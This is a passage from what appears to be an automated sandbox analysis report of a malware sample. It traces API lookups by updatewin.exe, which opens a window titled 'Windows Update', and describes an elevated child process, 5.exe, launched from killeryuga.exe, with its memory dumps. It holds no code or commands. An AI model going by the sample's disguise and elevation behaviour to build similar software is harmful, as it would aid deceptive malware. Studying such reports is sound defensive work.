Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 260 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System Get Time type = Ticks, time = 120229 True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76c34442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDesktopWindow, address_out = 0x74f60a19 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = InvalidateRect, address_out = 0x74f61381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x74f7e061 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x74f68deb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = FillRect, address_out = 0x74f60eb6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDlgItem, address_out = 0x74f7f1ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DialogBoxParamW, address_out = 0x74f7cfca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MoveWindow, address_out = 0x74f63698 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClientRect, address_out = 0x74f60c62 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateDialogParamW, address_out = 0x74f810dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowPos, address_out = 0x74f58e4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateAcceleratorW, address_out = 0x74f61246 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadAcceleratorsW, address_out = 0x74f64dd6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadStringW, address_out = 0x74f58eb9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x74f5b142 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoW, address_out = 0x74f63000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x74f63150 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x75aed41c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetBkMode, address_out = 0x75ae51a2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x75ae4f70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateFontW, address_out = 0x75aeb600 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x75ae5689 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateSolidBrush, address_out = 0x75ae4f17 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetTextAlign, address_out = 0x75ae8401 True 1
Fn
Module Load module_name = COMCTL32.dll, base_address = 0x74820000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, function = InitCommonControlsEx, address_out = 0x748409ce True 1
Fn
Module Load module_name = WINMM.dll, base_address = 0x74af0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\winmm.dll, function = timeGetTime, address_out = 0x74af26e0 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x749c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x749dc544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:38 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 18359128587 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Window Create window_name = Windows Update, class_name = WINDOWSUPDATE, wndproc_parameter = 0 True 1
Fn
Thread 0xa70
10 0
»
Category Operation Information Success Count Logfile
System Sleep duration = 1000 milliseconds (1.000 seconds) True 10
Fn
Process #12: 5.exe
1347 96
»
Information Value
ID #12
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:02, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:14
OS Process Information
»
Information Value
PID 0xa38
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A3C
0x A78
0x A7C
0x A80
0x A84
0x A88
0x A8C
0x A90
0x ACC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
5.exe 0x00400000 0x0047FFFF Marked Writable - 32-bit - False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00405B40, 0x0040273D False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040372A, 0x00404440 False
...
